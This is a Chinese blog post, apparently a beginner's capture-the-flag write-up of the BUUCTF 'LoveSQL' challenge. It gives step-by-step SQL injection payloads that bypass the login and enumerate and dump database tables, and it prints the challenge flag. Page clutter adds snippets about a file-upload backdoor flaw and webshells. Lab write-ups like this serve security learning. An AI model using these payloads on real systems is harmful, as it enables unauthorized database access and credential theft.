Buuctf-web-[极客大挑战2019]LoveSQL

最新推荐文章于 2024-04-15 09:12:45 发布
最新推荐文章于 2024-04-15 09:12:45 发布
阅读量271 收藏 1
点赞数 1
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yinger699/article/details/112299367
版权

[极客大挑战 2019]LoveSQL

在这里插入图片描述

首先打开这个界面,发现画面和上次做的[极客大挑战】easySQL类似。所以我们用万能密码试一下。
usename=admin;password=1’or’1’=‘1
发现用户错误,然后该换admin’#试一下,登录成功

在这里插入图片描述
接下来我们用SQL注入来做

1.首先查询字段数

check.php?username=admin’ order by 4%23&password=1%27or%271%271%3D%271
(因为url没有自动对#进行编码,所以我们要手动输入#的url编码%23,后面的password随便输)
当查询到4的时候报错,说明字段数是3
在这里插入图片描述

2.查询注入点

check.php?username=1’ union select 1,2,3%23&password=1%27or%271%271%3D%271
在这里插入图片描述

查询注入点是3

3.查询数据库名

check.php?username=1’ union select 1,2,database()%23&password=1%27or%271%271%3D%271
在这里插入图片描述

4.查询表名

check.php?username=1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘geek’%23&password=1%27or%271%271%3D%271

或者写为table_schema=database()
在这里插入图片描述
得到两个表名,随便跑一个,猜测应该是后面那个

5.查询表中的字段名

check.php?username=1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’%23&password=1%27or%271%271%3D%271

在这里插入图片描述
得到三个字段

6.爆出所有字段的数据

check.php?username=1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1%27or%271%271%3D%271

在这里插入图片描述
在这里插入图片描述
得出flag{011620cf-fe6f-4d83-b690-f93f13120197}

本题思想:根据SQL语言一步一步进入内层找到flag
(查询字段数——查询注入点——查询数据库名——进入数据库,查询表名——查询表的字段数——爆出所有字段的数据)
需掌握SQL语言,本题还涉及到url编码(#的编码是%23)

我只是个小白,写给自己看的,哪里写的不好,还望各位大佬指点。

'今天不吃糖~
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
微信小程序-极客学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
buuctf[极客挑战 2019]Knife1(详解)
2301_77451464的博客
02-03 660
题目首页点进去,看到。
BUUCTF:[极客挑战 2019]Knife
末初的CSDN博客
10-20 648
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
最新发布
2401_83739632的博客
04-15 356
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
BUUCTF Web [极客挑战 2019]EasySQL
热门推荐
wangyuxiang946的博客
10-20 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [HCTF 2018]WarmUp一、题目简介二、思路分析三、解题过程1)使用万能账号2)提交flag四、总结 一、题目简介 进入题目链接是一个登录界面,很明显,这一关是一个「SQL注入漏洞」。 二、思路分析 看到「登录」功能,第一反应就是尝试SQL注入漏洞。源码中并未对参数进.
BUUCTF [极客挑战 2019]Knife
stars的博客
10-28 169
文章目录题目解法扩展 题目 https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 解法 根据打开的页面提示,选择使用蚁剑尝试连接 地址:http://087fdd98-b888-4596-93d9-aec98575e831.node3.buuoj.cn/ 密码:Syc 连接成功,查找之后发现flag在根目录 flag即在flag文件中 扩展 真就是题如标题一样,白给的flag ..
GeekBand-IOS-1501-SampleProject:极客班IOS专业样本项目资源库
04-30
GeekBand-IOS-1501-SampleProject极客班IOS专业样本项目资源库为了推进项目实践,极客班将推出样本项目(蓦然)的Lab Manual帮助学员实践一个APP的开发。项目讨论区:更新日志:2015/09/23 蓦然LabManual_登录模块_...
Certificate-Engine:极客之家的证书引擎
05-15
在“ cehg / client / web-app”文件夹中打开终端/ cmd 运行“ npm install”以安装所有依赖项。 运行“ npm start”以启动开发服务器。 请阅读以获取有关CEHG网络应用程序入门的详细信息安卓应用使用颤振贡献指南...
thegeekdeveloper-portfolio:极客开发人员组合
05-13
极客开发人员组合 构建设置 # install dependencies $ npm install # serve with hot reload at localhost:3000 $ npm run dev # build for production and launch server $ npm run build $ npm start # generate ...
buu_WEB [极客挑战 2019]LoveSQL1
weixin_53146913的博客
04-05 174
由于一直学sql,但是一直记不住这个最最最基本注入的过程,所以专门写一篇记录一下。 一、万能密码登录,我们试一下: 在登录框中输入: 用户名:1' or 1=1# 密码:123(随便输) 二、 查询字段数: 在url中输入:注意:此时是在url中输入的,所以不能用#,而用其url编码%23。 /check.php?username=admin' order by 3%23&password=1 存在 /check.php?username=admin' order by 4%
buuctf-web-[极客挑战 2019]Knife1
mlws1900的博客
08-11 189
简简单单,webshell工具连接一下。
BUUCTF-Web-签到-[极客挑战 2019]Knife 1
weixin_42566218的博客
03-31 3829
BUUCTF-Web-Sql注入- 题目链接:BUUCTF 类型:签到题 知识点: php一句话木马(eval函数) 解题过程 这道题目属于签到题,解题之前先来了解一下php一句话木马,最基础的一句话木马由eval()内置变量$_POST/$_GET组成,eval()函数用于将字符串转换为php代码执行,而内置变量POST和_POST和P​OST和_GET存放用户请求参数,恶意用户通过将一句话木马文件上传到网页目录中,然后访问此文件构造恶意的php代码实现目标机器的增删改查,可以做一个小实验 mm
BUUCTF Web [极客挑战 2019]LoveSQL
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
buuctf-web-[极客挑战 2019]LoveSQL
weixin_46079186的博客
07-01 252
输入用户名admin’ 密码随便输 页面报错 尝试用万能用户名绕过 用户名输入:admin’or 1=1 # 密码随便输 登入成功 密码md5 解密一下没解出来,继续从登入框下手 admin’ order by 4 # 页面出错,说明3个列 输入admin’ union select 1,2,3 # 页面进入登入成功 6. 继续寻找回显点 1’union select 1,2,3 %23 // 这里用户名输什么都行就是不能输admin ,输adm..
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7179
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF WEB ESAYLOGIN
qq_41696858的博客
03-15 5493
登录注册首想二次注入,但是注册成功以后发现连个回显点都没有,所以这条路就断了 然后随便注册一个账号,有个getflag按钮,点击发现权限不够。这里就想到要伪造身份绕过了 审计注册页面源码,发现/static/js/app.js目录 看看,发现hint /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ 百度一下,看看koa是个啥,原来是个nodejs的web框架 function login() { const username
BUUCTF_[极客挑战 2019]LoveSQL解题思路
时光不老的博客
01-09 617
[极客挑战 2019]LoveSQL解题思路
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值